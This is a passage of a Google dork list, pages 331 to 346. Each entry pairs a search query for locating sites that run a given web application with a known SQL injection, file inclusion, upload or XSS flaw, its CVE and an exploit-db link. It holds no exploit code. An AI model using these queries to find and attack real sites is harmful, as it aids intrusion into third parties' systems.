inurl:treplies.asp?message=intitle:ASP Talk

inurl:treplies.asp?message=intitle:ASP Talk

ASP Talk (SQL/CSS) Multiple RemoteVulnerabilities: http://www.exploit-db.com/exploits/7378

inurl:"read.asp?fID=" inurl:"read.asp?fID="

JiRo?s FAQ Manager (read.asp fID)SQL Injection Vulnerability - CVE:2008-2691: http://www.exploit-db.com/exploits/5753

Page 331: Packetstorm Google Dorks List

"MidiCart PHPDatabaseManagement"

"MidiCart PHP DatabaseManagement"

MidiCart PHP,ASP Shell UploadVulnerability: http://www.exploit-db.com/exploits/12636

"Powered By TheBlack Lily 2007" "Powered By The Black Lily 2007"

Black Lily 2007 (products.php class)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/4444

inurl:"simpleblog3" inurl:"simpleblog3"

SimpleBlog 3.0 (simpleBlog.mdb)Database Disclosure Vulnerability:http://www.exploit-db.com/exploits/7232

allinurl:/m2f_usercp.php? allinurl:/m2f_usercp.php?

mail2forum phpBB Mod 1.2(m2f_root_path) Remote Include Vulns- CVE: 2006-3735: http://www.exploit-db.com/exploits/2019

powered byDreampics Builder powered by Dreampics Builder

Dreampics Builder (page) Remote SQLInjection Vulnerability - CVE: 2008-3119: http://www.exploit-db.com/exploits/6034

inurl:"classifide_ad.php" inurl:"classifide_ad.php"

AJ Auction 6.2.1 (classifide_ad.php)SQL Injection Vulnerability - CVE:2008-5212: http://www.exploit-db.com/exploits/5591

inurl:/jobsearchengine/ inurl:/jobsearchengine/

I-Net MLM Script Engine SQLInjection Vulnerability:http://www.exploit-db.com/exploits/14080

allinurl:"com_n-gallery" allinurl:"com_n-gallery"

Mambo Component n-gallery MultipleSQL Injection Vulnerabilities:http://www.exploit-db.com/exploits/5980

inurl:com_pinboard inurl:com_pinboard

Joomla Component com_pinboardRemote File Upload Vulnerability:http://www.exploit-db.com/exploits/9011

cat_sell.php?cid=orselloffers.php?cid=

cat_sell.php?cid= orselloffers.php?cid=

B2B Trading Marketplace SQLInjection Vulnerability - CVE: 2005-3937: http://www.exploit-db.com/exploits/10656

"Powered ByAzadi Network" "Powered By Azadi Network"

Azadi Network (page) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/10830

Page 332: Packetstorm Google Dorks List

"Powered by i-posStorefront" "Powered by i-pos Storefront"

I-Pos Internet Pay Online Store 1.3Beta SQL Injection Vulnerability -CVE: 2008-2634: http://www.exploit-db.com/exploits/5717

intitle:"ASP inlinecorporatecalendar"inurl:.asp?id=

intitle:"ASP inline corporatecalendar" inurl:.asp?id=

ASP Inline Corporate Calendar(SQL/XSS) Multiple RemoteVulnerabilities - CVE: 2009-2243:http://www.exploit-db.com/exploits/8756

inurl:friend.php?op=FriendSend inurl:friend.php?op=FriendSend

PHP-Nuke 'friend.php' Module RemoteSQL Injection: http://www.exploit-db.com/exploits/12525

inurl:com_gamesbox inurl:com_gamesbox

Joomla Component Gamesboxcom_gamesbox 1.0.2 (id) SQLInjection Vulnerability - CVE: 2010-2690: http://www.exploit-db.com/exploits/14126

"Powered byINVOhost" "Powered by INVOhost"

INVOhost SQL Injection - CVE: 2010-1336: http://www.exploit-db.com/exploits/11874

"Powered byWebStudioeHotel"

"Powered by WebStudio eHotel"

WebStudio eHotel (pageid) Blind SQLInjection Vulnerability - CVE: 2008-5293: http://www.exploit-db.com/exploits/7222

inurl:com_redshop inurl:com_redshop

Joomla redSHOP Component v1.0(com_redshop pid) SQL InjectionVulnerability - CVE: 2010-2694:http://www.exploit-db.com/exploits/14312

"Powered by yacs" "Powered by yacs"

YACS CMS 8.11 update_trailer.phpRemote File Inclusion Vulnerability:http://www.exploit-db.com/exploits/8066

"(C) byCyberTeddy" "(C) by CyberTeddy"

WebLog (index.php file) Remote FileDisclosure Vulnerability - CVE: 2007-1487: http://www.exploit-db.com/exploits/3484

"Powered byShout!" "Powered by Shout!"

ShoutCMS (content.php) Blind SqlInjection Vulnerability:http://www.exploit-db.com/exploits/11305

"2007 BookmarkXscript" "2007 BookmarkX script" BookmarkX script 2007 (topicid)

Remote SQL Injection Vulnerability -

Page 333: Packetstorm Google Dorks List

CVE: 2008-0695: http://www.exploit-db.com/exploits/5040

Doop CMS Doop CMS

doop CMS 1.3.7 (page) Local FileInclusion Vulnerability - CVE: 2007-5465: http://www.exploit-db.com/exploits/4536

"powered bysazcart" "powered by sazcart"

SazCart 1.5 (cart.php) Remote FileInclude Vulnerability - CVE: 2006-5727: http://www.exploit-db.com/exploits/2718

inurl:com_community inurl:com_community

Joomla Template BizWebcom_community Persistent XSSVulnerability: http://www.exploit-db.com/exploits/13955

allinurl:"/questcms/" allinurl:"/questcms/"

Questcms (XSS/DirectoryTraversal/SQL) Multiple RemoteVulnerabilities - CVE: 2008-4773:http://www.exploit-db.com/exploits/6853

inurl:news.php?mode=voir inurl:news.php?mode=voir

TR News 2.1 (nb) Remote SQLInjection Vulnerability - CVE: 2008-1957: http://www.exploit-db.com/exploits/5483

" Powered by PieCart Pro " " Powered by Pie Cart Pro "

Pie Cart Pro (Home_Path) Remote FileInclude Vulnerability - CVE: 2006-4970: http://www.exploit-db.com/exploits/2392

allinurl:readmore.php?news_id allinurl:readmore.php?news_id

PHP-Fusion v4.01 SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12635

inurl:index.php?ini[langpack]= inurl:index.php?ini[langpack]=

Weatimages 1.7.1 ini[langpack]Remote File Inclusion Vulnerability -CVE: 2007-1999: http://www.exploit-db.com/exploits/3700

"Powered by Elgg,the leading opensource socialnetworkingplatform"

"Powered by Elgg, the leading opensource social networking platform"

elgg 1.5 (/_css/js.php) Local FileInclusion Vulnerability - CVE: 2009-3149: http://www.exploit-db.com/exploits/9355

inurl:/index.php?option=com_yellowpages

inurl:/index.php?option=com_yellowpages

Joomla Yellowpages SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14592

Page 334: Packetstorm Google Dorks List

allinurl:"channel_detail.php?chid=" allinurl:"channel_detail.php?chid="

YouTube Clone Script (msg.php id)Remote SQL Injection Vulnerability -CVE: 2007-3518: http://www.exploit-db.com/exploits/4136

inurl:apages.php inurl:apages.phpArab Network Tech. (ANT) CMS SQLInjection: http://www.exploit-db.com/exploits/11339

"EmanueleGuadagnoli""CcMail"

"Emanuele Guadagnoli" "CcMail" CcMail

This FAQ ispowered byCascadianFAQ

This FAQ is powered byCascadianFAQ

CascadianFAQ 4.1 (index.php) RemoteSQL Injection Vulnerability - CVE:2007-0631: http://www.exploit-db.com/exploits/3227

"Designed &Developed by net-finity"

"Designed & Developed by net-finity"

net-finity (links.php) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/4629

intext:Powered byCPA SiteSolutions

intext:Powered by CPA SiteSolutions

CPA Site Solutions Remote FileUpload Vulnerability:http://www.exploit-db.com/exploits/11365

"site powered byintuitive-websites.com"

"site powered by intuitive-websites.com"

intuitive (form.php) Sql InjectionVulnerability: http://www.exploit-db.com/exploits/11481

ClearBudgetv0.6.1 ClearBudget v0.6.1

ClearBudget 0.6.1 Insecure CookieHandling / LFI Vulnerabilities:http://www.exploit-db.com/exploits/7992

inurl:func=selectcat +com_remository

inurl:func=selectcat +com_remository

Mambo Component RemoSitory (cat)Remote SQL Injection Vulnerability -CVE: 2007-4505: http://www.exploit-db.com/exploits/4306

"ShopMaker v1.0" "ShopMaker v1.0"

ShopMaker 1.0 (product.php id)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/6799

"Powered by jSite1.0 OE" "Powered by jSite 1.0 OE"

jSite 1.0 OE (SQL/LFI) MultipleRemote Vulnerabilities - CVE: 2008-3192: http://www.exploit-db.com/exploits/6057

Powered by Powered by Online Email Manager Online Email Manager Insecure

Page 335: Packetstorm Google Dorks List

Online EmailManager

Cookie Handling Vulnerability:http://www.exploit-db.com/exploits/8476

"Web Site Designby Red CatStudios"

"Web Site Design by Red CatStudios"

Realtor WebSite System E-Commerceidfestival SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12776

inurl:"webboard/view.php?topic=" inurl:"webboard/view.php?topic="

Webboard v.2.90 beta Remote FileDisclosure Vulnerability - CVE: 2009-2600: http://www.exploit-db.com/exploits/8823

/index.php?option=com_restaurante /index.php?option=com_restaurante

Joomla Component RestauranteRemote File Upload Vulnerability -CVE: 2007-4817: http://www.exploit-db.com/exploits/4383

inurl:"com_portfol" inurl:"com_portfol"

Joomla Component Portfol (vcatid)SQL Injection Vulnerability - CVE:2009-0494: http://www.exploit-db.com/exploits/7734

intitle:"DUcalendar 1.0" intitle:"DUcalendar 1.0"

DUcalendar 1.0 (detail.asp iEve)Remote SQL Injection Vulnerability -CVE: 2008-2868: http://www.exploit-db.com/exploits/5927

inurl:/infusions/e_cart inurl:/infusions/e_cart

PHP-Fusion Mod E-Cart 1.3(items.php CA) SQL InjectionVulnerability - CVE: 2009-0832:http://www.exploit-db.com/exploits/7698

inurl:com_jstore inurl:com_jstorejoomla com_jstore SQLi Vulnerability:http://www.exploit-db.com/exploits/13796

allintext:"Browseour directory ofour members topsites or create yourown for free!"

allintext:"Browse our directory ofour members top sites or create yourown for free!"

PHP123 Top Sites (category.php cat)Remote SQL Injection Vuln - CVE:2007-4054: http://www.exploit-db.com/exploits/4241

allinurl:flashblog.html "flashblog" allinurl:flashblog.html "flashblog"

FlashBlog (articulo_id) Remote SQLInjection Vulnerability - CVE: 2008-2572: http://www.exploit-db.com/exploits/5685

com_easybook com_easybookJoomla Component EasyBook 1.1(gbid) SQL Injection - CVE: 2008-2569: http://www.exploit-

Page 336: Packetstorm Google Dorks List

db.com/exploits/5740

inurl:index.php?option=com_nicetalk

inurl:index.php?option=com_nicetalk

Joomla Component Nice Talk 0.9.3(tagid) SQL Injection Vulnerability -CVE: 2007-4503: http://www.exploit-db.com/exploits/4308

"ParsBlogger ?2006. All rightsreserved"

"ParsBlogger ? 2006. All rightsreserved"

ParsBlogger (links.asp id) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/6745

Powered byCMScout (c)2005CMScout Group

Powered by CMScout (c)2005CMScout Group

CMScout (XSS/HTML Injection)Multiple Vulnerabilities - CVE: 2010-2154: http://www.exploit-db.com/exploits/12806

powered byminimal Gallery0.8

powered by minimal Gallery 0.8

minimal Gallery 0.8 Remote FileDisclosure Vulnerability - CVE: 2008-0259: http://www.exploit-db.com/exploits/4902

powered by sX-Shop powered by sX-Shop

sX-Shop (view_image.php) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/14557

inurl:"com_ignitegallery" inurl:"com_ignitegallery"

Joomla Component Ignite Gallery 0.8.3SQL Injection Vulnerability - CVE:2008-6182: http://www.exploit-db.com/exploits/6723

inurl:com_brightweblinks inurl:com_brightweblinks

Joomla Componentcom_brightweblinks (catid) SQLInjection Vulnerability - CVE: 2008-3083: http://www.exploit-db.com/exploits/5993

"Powered by:PhotoPost PHP4.6" or "Poweredby: PhotoPost PHP4.5"

"Powered by: PhotoPost PHP 4.6"or "Powered by: PhotoPost PHP4.5"

PhotoPost 4.6 (PP_PATH) Remote FileInclude Vulnerability - CVE: 2006-4828: http://www.exploit-db.com/exploits/2369

Powered byodlican.net cmsv.1.5

Powered by odlican.net cms v.1.5

odlican.net cms v.1.5 Remote FileUpload Vulnerability:http://www.exploit-db.com/exploits/11340

Powered Byform2list Powered By form2list

form2list (page.php id) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/8348

Page 337: Packetstorm Google Dorks List

inurl:/_blogadata/ inurl:/_blogadata/

Blogator-script 0.95 (id_art) RemoteSQL Injection Vulnerability - CVE:2008-1763: http://www.exploit-db.com/exploits/5368

SPBOARD v4.5 SPBOARD v4.5

Sepal SPBOARD 4.5 (board.cgi)Remote Command Exec Vulnerability- CVE: 2008-4873: http://www.exploit-db.com/exploits/6864

inurl:com_jmarket inurl:com_jmarketjoomla com_jmarket SQLiVulnerability: http://www.exploit-db.com/exploits/13799

inurl:com_jtickets inurl:com_jticketsjoomla com_jtickets SQLiVulnerability: http://www.exploit-db.com/exploits/13797

inurl:"com_rwcards" inurl:"com_rwcards"

Joomla Component com_rwcards -Local File Inclusion:http://www.exploit-db.com/exploits/11772

"index.php?sbjoke_id=" "index.php?sbjoke_id="

Jokes & Funny Pics Script (sb_jokeid)SQL Injection Vulnerability - CVE:2008-2874: http://www.exploit-db.com/exploits/5934

"This website wascreated withphpWebThings"

"This website was created withphpWebThings"

phpWebThings 1.5.2 (editor.php)Remote File Include Vulnerability -CVE: 2006-6042: http://www.exploit-db.com/exploits/2811

inurl:questions.php?idcat inurl:questions.php?idcat

EsFaq 2.0 (idcat) Remote SQLInjection Vulnerability - CVE: 2008-3952: http://www.exploit-db.com/exploits/6383

photokorn 1.52 photokorn 1.52

PhotoKorn Gallery 1.52 (dir_path)Remote File Include Vulnerabilities -CVE: 2006-4670: http://www.exploit-db.com/exploits/2327

Powered bySAPID CMFBuild 87

Powered by SAPID CMF Build 87

SAPID CMF Build 87 (last_module)Remote Code Execution Vulnerability- CVE: 2007-5056: http://www.exploit-db.com/exploits/5097

inurl:"directory.php?cat=" pubs inurl:"directory.php?cat=" pubs

Prozilla Pub Site Directory(directory.php cat) SQL InjectionVulnerbility - CVE: 2007-4258:http://www.exploit-db.com/exploits/4265

Page 338: Packetstorm Google Dorks List

inurl:"userjournals.php?blog." inurl:"userjournals.php?blog."

e107 Plugin userjournals_menu(blog.id) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/8417

inurl:"com_youtube" inurl:"com_youtube"

Joomla Component (com_youtube)SQL Injection Vulnerability - CVE:2010-2923: http://www.exploit-db.com/exploits/14467

inurl:"index.php?serverid=" inurl:"index.php?serverid="

Ultrastats 0.2.144/0.3.11 (index.phpserverid) SQL Injection Vulnerability -CVE: 2008-6260: http://www.exploit-db.com/exploits/7148

inurl:"com_photoblog" inurl:"com_photoblog"

Joomla (com_photoblog) Blind SqlInjection Vulnerability - CVE: 2010-0610: http://www.exploit-db.com/exploits/11337

inurl:indexmess.php inurl:indexmess.php

Messagerie Locale (centre.php)Remote File Inclusion Vulnerability:http://www.exploit-db.com/exploits/2832

inurl:com_joomradio inurl:com_joomradio

Joomla Component joomradio 1.0 (id)SQL Injection Vulnerability - CVE:2008-2633: http://www.exploit-db.com/exploits/5729

inurl:com_jnewsletter inurl:com_jnewsletter

joomla com_jnewsletter SQLiVulnerability: http://www.exploit-db.com/exploits/13804

inurl:inc_classifiedlistingsmanager.asp

inurl:inc_classifiedlistingsmanager.asp

DMXReady Classified ListingsManager 1.1 SQL InjectionVulnerability - CVE: 2009-0426:http://www.exploit-db.com/exploits/7767

Powered byOnline GuestbookPro

Powered by Online Guestbook Pro

Online Guestbook Pro (display) BlindSQL Injection Vulnerability:http://www.exploit-db.com/exploits/8475

"Powered by PGOnline TrainingSolution - learningmanagementsystem"

"Powered by PG Online TrainingSolution - learning managementsystem"

Pilot Group eTraining (news_read.phpid) SQL Injection Vulnerability - CVE:2008-4709: http://www.exploit-db.com/exploits/6613

inurl:"track.php?id=" inurl:"track.php?id=" phpstore Wholesale (track.php?id)

SQL Injection Vulnerability - CVE:

Page 339: Packetstorm Google Dorks List

2008-5493: http://www.exploit-db.com/exploits/7134

inurl:com_jcommunity inurl:com_jcommunity

joomla com_jcommunity SQLiVulnerability: http://www.exploit-db.com/exploits/13798

inurl:cart.php?m=features&id= inurl:cart.php?m=features&id=

digiSHOP SQL Injection Vulnerability:http://www.exploit-db.com/exploits/15405

/modules/tadbook2/open_book.php?book_sn=

/modules/tadbook2/open_book.php?book_sn=

XOOPS Module tadbook2(open_book.php book_sn) SQLInjection Vuln: http://www.exploit-db.com/exploits/7725

''links.asp?CatId'' ''links.asp?CatId''

ASPapp (links.asp CatId) Remote SQLInjection Vulnerability - CVE: 2008-1430: http://www.exploit-db.com/exploits/5276

Powered by:PHPDirector 0.30ornurl:videos.php?id=

Powered by: PHPDirector 0.30 ornurl:videos.php?id=

PHPDirector 0.30 (videos.php) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/14106

Powered by: ArabPortalinurl:mod.php?mod=html

Powered by: Arab Portalinurl:mod.php?mod=html

Arab Portal 2.1 Remote File DisclosureVulnerability - CVE: 2008-5787:http://www.exploit-db.com/exploits/7019

"Powered byRedCat"inurl:index.php?contentId=

"Powered by RedCat"inurl:index.php?contentId=

redcat media SQL Injection:http://www.exploit-db.com/exploits/10043

inurl:"search_form.php?sb_showresult="

inurl:"search_form.php?sb_showresult="

Getacoder clone (sb_protype) RemoteSQL Injection Vulnerability - CVE:2008-3372: http://www.exploit-db.com/exploits/6143

Powered byboastMachine v3.1 Powered by boastMachine v3.1

boastMachine 3.1 (mail.php id) SQLInjection Vulnerability - CVE: 2008-0422: http://www.exploit-db.com/exploits/4952

"index.php?section=post_upload" "index.php?section=post_upload"

DDL-Speed Script (acp/backup)Admin Backup Bypass Vulnerability:http://www.exploit-db.com/exploits/7629

Copyright 2007, Copyright 2007, phpAuction 3.2.1 (item.php id) Remote

Page 340: Packetstorm Google Dorks List

PHPAUCTION.NET

PHPAUCTION.NET SQL Injection Vulnerability - CVE:2008-2900: http://www.exploit-db.com/exploits/5892

Online BookingManager2.2 Online Booking Manager2.2

Online Booking Manager 2.2 (id) SQLInjection Vulnerability - CVE: 2008-5194: http://www.exploit-db.com/exploits/5964

"cms SunLight5.2" "cms SunLight 5.2"

SunLight CMS 5.3 (root) Remote FileInclusion Vulnerabilities - CVE: 2007-2774: http://www.exploit-db.com/exploits/3953

option=com_paxxgallery option=com_paxxgallery

Joomla Component paxxgallery 0.2(gid) Blind SQL Injection:http://www.exploit-db.com/exploits/5514

inurl:index.php?option=com_NeoRecruit

inurl:index.php?option=com_NeoRecruit

Joomla Component NeoRecruit 1.4 (id)SQL Injection Vulnerability - CVE:2007-4506: http://www.exploit-db.com/exploits/4305

powered by x7chat 1.3.6b powered by x7 chat 1.3.6b

X7CHAT v1.3.6b Add Admin:http://www.exploit-db.com/exploits/10931

"Powered byBattle Blog" "Powered by Battle Blog"

Battle Blog 1.25 (comment.asp)Remote SQL Injection Vulnerability -CVE: 2008-2626: http://www.exploit-db.com/exploits/5731

inurl:"vcalendar_asp" inurl:"vcalendar_asp"

VCalendar (VCalendar.mdb) RemoteDatabase Disclosure Vulnerability:http://www.exploit-db.com/exploits/7180

inurl:"com_simpledownload" inurl:"com_simpledownload"

Joomla Component simpledownloadLocal File Disclosure - CVE: 2010-2122: http://www.exploit-db.com/exploits/12623

allinurl:"/modules/tutorials/"

allinurl :"/modules/tutorials/"

XOOPS Module tutorials(printpage.php) SQL InjectionVulnerability - CVE: 2008-1351:http://www.exploit-db.com/exploits/5245

intext:Powered byInfront intext:Powered by Infront

Infront SQL Injection Vulnerability:http://www.exploit-db.com/exploits/13848

Page 341: Packetstorm Google Dorks List

Powered by InfoFisier. Powered by Info Fisier.

Info Fisier 1.0 multiple Vulnerabilities:http://www.exploit-db.com/exploits/10728

powered by joovili powered by joovili

Joovili 3.0.6 (joovili.images.php)Remote File Disclosure Vulnerability -CVE: 2007-6621: http://www.exploit-db.com/exploits/4799

intext:Powered bySaphpLesson 4.0 intext:Powered by SaphpLesson 4.0

SaphpLesson v4.0 (Auth Bypass) SQLInjection Vulnerability - CVE: 2009-2883: http://www.exploit-db.com/exploits/9248

infusions/triscoop_race_system/race_details.php?

infusions/triscoop_race_system/race_details.php?

PHP-Fusion Modtriscoop_race_system (raceid) SQLInjection Vuln: http://www.exploit-db.com/exploits/6684

Powered byWHMCompleteSolution - orinurl:WHMCS

Powered byWHMCompleteSolution - orinurl:WHMCS

WHMCS control(WHMCompleteSolution) Sql Injection- CVE: 2010-1702: http://www.exploit-db.com/exploits/12371

intext:"Event List0.8 Alpha byschlu.net "

intext:"Event List 0.8 Alpha byschlu.net "

Joomla Component EventList 0.8 (did)SQL Injection Vulnerability - CVE:2007-4509: http://www.exploit-db.com/exploits/4309

inurl:"product_desc.php?id="Powered byZeeways.com

inurl:"product_desc.php?id="Powered by Zeeways.com

Zeeways Script MultipleVulnerabilities - CVE: 2010-2144:http://www.exploit-db.com/exploits/12805

"Website poweredby SubdreamerCMS & SequelTheme Designedby indiqo.media"

"Website powered by SubdreamerCMS & Sequel Theme Designed byindiqo.media"

Subdreamer Pro v3.0.4 CMS uploadVulnerability: http://www.exploit-db.com/exploits/14101

developed byARWScripts.com developed by ARWScripts.com

Free Photo Gallery Site Script (path)File Disclosure Vulnerability - CVE:2008-1730: http://www.exploit-db.com/exploits/5419

"powered by CMSMade Simpleversion 1.1.2"

"powered by CMS Made Simpleversion 1.1.2"

CMS Made Simple 1.2 Remote CodeExecution Vulnerability - CVE: 2007-5056: http://www.exploit-db.com/exploits/4442

"Desenvolvido porWeBProdZ" "Desenvolvido por WeBProdZ"

WeBProdZ CMS SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12522

Page 342: Packetstorm Google Dorks List

inurl:"inurl:file.php?recordID=" inurl:"inurl:file.php?recordID="

FILE SHARE v1.0 SQL InjectionVulnerability: http://www.exploit-db.com/exploits/10497

inurl:"view.php?ItemID=" rating"rate this review"

inurl:"view.php?ItemID=" rating"rate this review"

Prozilla Reviews Script 1.0 ArbitraryDelete User Vulnerability - CVE:2008-1783: http://www.exploit-db.com/exploits/5387

"WebdesignCosmos Solutions" "Webdesign Cosmos Solutions"

Cosmos Solutions cms SQL InjectionVulnerability ( id= / page= ):http://www.exploit-db.com/exploits/12794

inurl:cal_cat.php?op= inurl:cal_cat.php?op=

Calendarix (cal_cat.php) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14393

inurl:com_liveticker inurl:com_liveticker

Joomla Component Live Ticker 1.0(tid) Blind SQL Injection Vuln - CVE:2008-6148: http://www.exploit-db.com/exploits/7573

intext:"Poweredby the 1-2-3 musicstore"

intext:"Powered by the 1-2-3 musicstore"

Easybe 1-2-3 Music Store(process.php) Remote SQL InjectionVuln - CVE: 2007-3520:http://www.exploit-db.com/exploits/4134

"Powered bymyBusinessAdminand Red CowTechnologies,Inc."

"Powered by myBusinessAdminand Red Cow Technologies, Inc."

myBusinessAdmin (content.php) BlindSql Injection Vulnerability:http://www.exploit-db.com/exploits/11327

"Powered bycityadmin and RedCowTechnologies,Inc."

"Powered by cityadmin and RedCow Technologies, Inc."

cityadmin (links.php) Blind SqlInjection Vulnerability:http://www.exploit-db.com/exploits/11326

"Powered byRealAdmin andRed CowTechnologies,Inc."

"Powered by RealAdmin and RedCow Technologies, Inc."

RealAdmin (detail.php) Blind SqlInjection Vulnerability:http://www.exploit-db.com/exploits/11325

?action=pro_showand?action=disppro

?action=pro_show and?action=disppro

EPShop 3.0 (pid) Remote SQLInjection Vulnerability - CVE: 2008-3412: http://www.exploit-db.com/exploits/6139

Powered by Powered by WebspotBlogging bspotBlogging 3.0.1 (path) Remote

Page 343: Packetstorm Google Dorks List

WebspotBlogging File Include Vulnerability - CVE:2006-2860: http://www.exploit-db.com/exploits/1871

"powered by vspstats processor" "powered by vsp stats processor"

vsp stats processor 0.45 (gamestat.phpgameID) SQL Injection Vuln - CVE:2009-1224: http://www.exploit-db.com/exploits/8331

inurl:employer_profile.php?compid=

inurl:employer_profile.php?compid=

ZEEJOBSITE 2.0 (adid) Remote SQLInjection Vulnerability - CVE: 2008-3706: http://www.exploit-db.com/exploits/6249

inurl:com_awd_song inurl:com_awd_song

Joomla JE Awd Song ComponentPersistent XSS Vulnerability - CVE:2010-2613: http://www.exploit-db.com/exploits/14059

"MangoBery 1.0Alpha" "MangoBery 1.0 Alpha"

MangoBery CMS 0.5.5 (quotes.php)Remote File Inclusion Vulnerability -CVE: 2007-1837: http://www.exploit-db.com/exploits/3598

inurl:view_group.php?id= inurl:view_group.php?id=

BookMarks Favourites Script(view_group.php id) SQL InjectionVuln - CVE: 2008-6007:http://www.exploit-db.com/exploits/6637

mod.php?mod=publisher&op=printarticle&artid=

mod.php?mod=publisher&op=printarticle&artid=

eNdonesia 8.4 SQL InjectionVulnerability - CVE: 2010-3461:http://www.exploit-db.com/exploits/15006

inurl:"index.php?option=com_spa" inurl:"index.php?option=com_spa"

Joomla Component com_spa SQLInjection Vulnerability:http://www.exploit-db.com/exploits/14423

inurl:"photo_album.php?alb_id=" inurl:"photo_album.php?alb_id="

SpireCMS v2.0 SQL InjectionVulnerability: http://www.exploit-db.com/exploits/10408

intext : "Websitebyconceptinternetltd"

intext : "Website byconceptinternetltd"

Concept E-commerce SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14512

allinurl:"index.php?p=gallerypic img_id"

allinurl: "index.php?p=gallerypicimg_id"

Koobi 4.4/5.4 gallery Remote SQLInjection Vulnerability - CVE: 2008-6210: http://www.exploit-db.com/exploits/5415

Page 344: Packetstorm Google Dorks List

allinurl:com_jpad allinurl:com_jpad

Joomla Component JPad 1.0 SQLInjection Vulnerability (postauth) -CVE: 2008-4715: http://www.exploit-db.com/exploits/5493

allinurl:"com_candle" allinurl:"com_candle"

Joomla Component Candle 1.0 (cID)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5221

"powered byFlatPress" "powered by FlatPress"

FlatPress 0.909.1 Stored XSSVulnerability: http://www.exploit-db.com/exploits/12034

inurl:ugroups.php?UID= inurl:ugroups.php?UID=

TubeGuru Video Sharing Script (UID)SQL Injection Vulnerability - CVE:2008-3674: http://www.exploit-db.com/exploits/6170

allinurl:option=com_livechat allinurl:option=com_livechat

Joomla Live Chat (SQL/Proxy)Multiple Remote Vulnerabilities -CVE: 2008-6883: http://www.exploit-db.com/exploits/7441

Powered by PHPMelody 1.5.3 Powered by PHP Melody 1.5.3

blog ink Bypass Setting Vulnerability:http://www.exploit-db.com/exploits/11462

Powered byphpMyDesktop|arcade v1.0 (final)

Powered by phpMyDesktop|arcadev1.0 (final)

PhpMyDesktop|arcade 1.0 Final(phpdns_basedir) RFI Vulnerability:http://www.exploit-db.com/exploits/4755

inurl:com_products "intCategoryId" inurl:com_products "intCategoryId"

Joomla com_products 'intCategoryId'Remote Sql Injection Vulnerability:http://www.exploit-db.com/exploits/11691

inurl:"guestbook.admin.php?action=settings"

inurl:"guestbook.admin.php?action=settings"

Jax Guestbook 3.50 Admin Login -CVE: 2009-4447: http://www.exploit-db.com/exploits/10626

inurl:index.php?mod=jeuxflash inurl:index.php?mod=jeuxflash

KwsPHP Module jeuxflash 1.0 (id)Remote SQL Injection Vulnerability -CVE: 2007-4922: http://www.exploit-db.com/exploits/4400

inurl:"track.php?id=" inurl:"track.php?id="

SFS EZ BIZ PRO (track.php id)Remote SQL Injection Vulnerability -CVE: 2008-6245: http://www.exploit-db.com/exploits/6910

"Ladder Scripts "Ladder Scripts by" My Gaming Ladder 7.5 (ladderid) SQL

Page 345: Packetstorm Google Dorks List

by" Injection Vulnerability - CVE: 2008-1791: http://www.exploit-db.com/exploits/5401

"powergap" or"s04.php" ors01.php or s02.php

"powergap" or "s04.php" or s01.phpor s02.php

POWERGAP 2003 (s0x.php) RemoteFile Include Vulnerability - CVE:2006-4236: http://www.exploit-db.com/exploits/2201

"Developed byBispage.com" "Developed by Bispage.com"

bispage Bypass Vulnerability:http://www.exploit-db.com/exploits/11555

"PKs MovieDatabase" "PKs Movie Database"

PKs Movie Database 3.0.3 XSS / SQLInjection Vulnerabilities:http://www.exploit-db.com/exploits/5095

inurl:enq/big.asp?id= inurl:enq/big.asp?id=

(big.asp) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12533

allintext:"PoweredBy Buddy Zone" allintext:"Powered By Buddy Zone"

Buddy Zone 1.5 (view_sub_cat.phpcat_id) SQL Injection Vulnerability -CVE: 2007-3549: http://www.exploit-db.com/exploits/4127

intext:" WebsiteDesign andHosting ByNetricks, Inc."

intext:" Website Design andHosting By Netricks, Inc."

Website Design and Hosting ByNetricks, Inc (news.php) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12736

com_thyme com_thyme

Joomla Component Thyme 1.0 (event)SQL Injection Vulnerability - CVE:2008-6116: http://www.exploit-db.com/exploits/7182

"PHPWEBQUESTVERSION " orinurl:"/phpwebquest/"

"PHP WEBQUEST VERSION " orinurl:"/phpwebquest/"

PHP Webquest 2.6 Get DatabaseCredentials Vulnerability - CVE: 2008-0249: http://www.exploit-db.com/exploits/4872

All right reserved2002-2003(MSN/Web ServerCreator)

All right reserved 2002-2003(MSN/Web Server Creator)

Web Server Creator - Web Portal v 0.1Multi Vulnerability - CVE: 2010-1113:http://www.exploit-db.com/exploits/11569

"Powerd bywww.e-webtech.com"

"Powerd by www.e-webtech.com"e-webtech (page.asp) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12571

powered by powered by PhpMesFilms PhpMesFilms 1.0 (index.php id)

Page 346: Packetstorm Google Dorks List

PhpMesFilms Remote SQL Injection Vulnerability -CVE: 2009-0598: http://www.exploit-db.com/exploits/7660

"InternetPhotoshow -Slideshow"

"Internet Photoshow - Slideshow"

Internet Photoshow (Special Edition)Insecure Cookie Handling Vuln - CVE:2008-2282: http://www.exploit-db.com/exploits/5617

inurl:choosecard.php?catid= inurl:choosecard.php?catid=

WEBBDOMAIN Post Card 1.02(catid) SQL Injection Vulnerability -CVE: 2008-6622: http://www.exploit-db.com/exploits/6977

"Powered by RealEstate Portal" "Powered by Real Estate Portal"

NetArtMedia Real Estate Portal 1.2(ad_id) SQL Injection Vuln - CVE:2008-5309: http://www.exploit-db.com/exploits/7208

inurl:browsecats.php?cid= inurl:browsecats.php?cid=

PozScripts Classified Ads Script (cid)SQL Injection Vulnerability - CVE:2008-3672: http://www.exploit-db.com/exploits/6169

inurl:com_mdigg inurl:com_mdigg

Joomla Component mdigg 2.2.8(category) SQL Injection Vuln - CVE:2008-6149: http://www.exploit-db.com/exploits/7574

"by in-link" or"Powered by In-Link 2."

